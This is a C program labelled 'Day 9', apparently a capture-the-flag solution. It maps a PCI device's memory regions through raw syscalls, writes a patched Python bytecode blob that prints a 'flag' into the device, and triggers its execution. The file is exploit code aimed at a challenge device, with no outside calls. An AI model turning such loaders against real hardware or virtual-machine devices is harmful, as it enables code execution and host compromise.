Day 9

// gcc -nostdlib -static mmio_loader.c -o mmio_loader

typedef unsigned long ulong;
typedef unsigned long long u64;
typedef unsigned int u32;
typedef unsigned char u8;

#define SYS_OPENAT  257
#define SYS_MMAP    9
#define SYS_WRITE   1
#define SYS_EXIT    60

// ------------------- syscalls ------------------------

static inline long sys_openat(int dirfd, const char *path, int flags) {
    long ret;
    asm volatile ("syscall"
        : "=a"(ret)
        : "0"(SYS_OPENAT), "D"(dirfd), "S"(path), "d"(flags)
        : "rcx", "r11", "memory");
    return ret;
}

static inline long sys_mmap(void *addr, ulong len, ulong prot,
                            ulong flags, ulong fd, ulong off) {
    long ret;
    register ulong r10 asm("r10") = flags;
    register ulong r8  asm("r8")  = fd;
    register ulong r9  asm("r9")  = off;

    asm volatile(
        "syscall"
        : "=a"(ret)
        : "0"(SYS_MMAP),
          "D"(addr),
          "S"(len),
          "d"(prot),
          "r"(r10),
          "r"(r8),
          "r"(r9)
        : "rcx", "r11", "memory"
    );
    return ret;
}

// *** FIXED: length should be size_t/ulong, NOT int ****
static inline long sys_write(int fd, const void *buf, ulong len) {
    long ret;
    asm volatile ("syscall"
        : "=a"(ret)
        : "0"(SYS_WRITE), "D"(fd), "S"(buf), "d"(len)
        : "rcx", "r11", "memory");
    return ret;
}

static inline void sys_exit(int code) {
    asm volatile(
        "syscall"
        :
        : "a"(SYS_EXIT), "D"(code)
        : "rcx", "r11", "memory"
    );
}

// ------------------- utils ------------------------


// ------------------- main ------------------------

static const char path[] =
"/sys/bus/pci/devices/0000:00:03.0/resource0";

static const char path1[] =
"/sys/bus/pci/devices/0000:00:03.0/resource1";

void _start() {

    long fd = sys_openat(-100, path, 2);   // O_RDWR
    if (fd < 0) sys_exit(1);

    long fd1 = sys_openat(-100, path1, 2);   // O_RDWR
    if (fd1 < 0) sys_exit(1);
    // ****** FIXED MMAP FLAGS ******
    // You used MAP_PRIVATE | MAP_SHARED → illegal → mmap failure → SEGFAULT
    //
    // Correct for PCI BAR mapping:
    //      prot = PROT_READ|PROT_WRITE = 3
    //      flags = MAP_SHARED | MAP_FIXED? no.
    //      flags = MAP_SHARED | MAP_FILE = 1 | 0x20
    //
    // For PCI BAR, MAP_SHARED (1) is enough.

    u8 *mmio = (u8*)sys_mmap(
        0,          // addr
        0x1000,     // len
        1 | 2,      // prot = PROT_READ|PROT_WRITE
        1,          // flags = MAP_SHARED
        fd,         // file descriptor
        0           // offset 0
    );

    if (mmio == (void*)-1 || mmio == 0)
        sys_exit(18);


    u8 *stdout = (u8*)sys_mmap(
        0,          // addr
        0x1000,     // len
        1 | 2,      // prot = PROT_READ|PROT_WRITE
        1,          // flags = MAP_SHARED
        fd1,         // file descriptor
        0           // offset 0
    );

    if (stdout == (void*)-1 || stdout == 0)
        sys_exit(18);

    // ------------------------------
    // Send test Python bytecode
    // ------------------------------

    u8 patch_bytes[] = {
    0xf3,0x0d,0x0d,0x0a,0x03,0x00,0x00,0x00,0x20,0x2a,0xf1,0xcf,0x3a,0x47,0xf4,0xcd
};

    const u8 code[] = { 0xf3,0x0d,0x0d,0x0a,0x00,0x00,0x00,0x00,0x79,0xca,0x38,0x69,0x66,0x00,0x00,0x00,0xe3,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf3,0x5a,0x00,0x00,0x00,0x95,0x00,0x1e,0x00,0x53,0x00,0x53,0x01,0x4b,0x00,0x72,0x00,0x5c,0x01,0x22,0x00,0x5c,0x00,0x52,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x35,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x67,0x01,0x21,0x00,0x5c,0x03,0x07,0x00,0x61,0x0b,0x00,0x00,0x20,0x00,0x5c,0x01,0x22,0x00,0x53,0x02,0x35,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x1f,0x00,0x67,0x01,0x66,0x00,0x3d,0x03,0x1f,0x00,0x66,0x01,0x29,0x03,0xe9,0x00,0x00,0x00,0x00,0x4e,0x7a,0x17,0x4e,0x6f,0x20,0x67,0x69,0x66,0x74,0x73,0x20,0x61,0x72,0x65,0x20,0x61,0x76,0x61,0x69,0x6c,0x61,0x62,0x6c,0x65,0x21,0x29,0x04,0xda,0x05,0x67,0x69,0x66,0x74,0x73,0xda,0x05,0x70,0x72,0x69,0x6e,0x74,0xda,0x04,0x66,0x6c,0x61,0x67,0xda,0x09,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0xa9,0x00,0xf3,0x00,0x00,0x00,0x00,0xda,0x04,0x6f,0x2e,0x70,0x79,0xda,0x08,0x3c,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x3e,0x72,0x0a,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x73,0x31,0x00,0x00,0x00,0xf0,0x03,0x01,0x01,0x01,0xf0,0x02,0x04,0x01,0x25,0xdb,0x04,0x10,0xd9,0x04,0x09,0x88,0x25,0x8f,0x2a,0x89,0x2a,0xd5,0x04,0x15,0xf8,0xd8,0x07,0x10,0xf3,0x00,0x01,0x01,0x25,0xd9,0x04,0x09,0xd0,0x0a,0x23,0xd6,0x04,0x24,0xf0,0x03,0x01,0x01,0x25,0xfa,0x73,0x0c,0x00,0x00,0x00,0x82,0x16,0x19,0x00,0x99,0x0e,0x2a,0x03,0xa9,0x01,0x2a,0x03};
    
    const u32 code_len = sizeof(code);
    


    u64 val = 0xf0a0101a75bc9dd3ULL;
    *(u64*)(code + 0x08) = val;

    for (u32 i = 0; i < code_len; i++)
        mmio[0x100 + i] = code[i];

  

    // scratch register
    *(u32*)(mmio + 0x04) = code_len;

    // code length
    *(u32*)(mmio + 0x10) = code_len;

    // trigger execution
    *(u32*)(mmio + 0x0C) = 1;


    char* msg = "MMIO write complete\n";
    sys_write(1, msg, 11);


    for (int i=0; i < 100; i++) {
        char magic = *(char*)(stdout + i);
        sys_write(1, &magic, 1);
    }
    

    




    // verify device responds
    // print_hex32(*(u32*)(mmio + 0x00));   // should print PYPU magic


    sys_exit(0);
}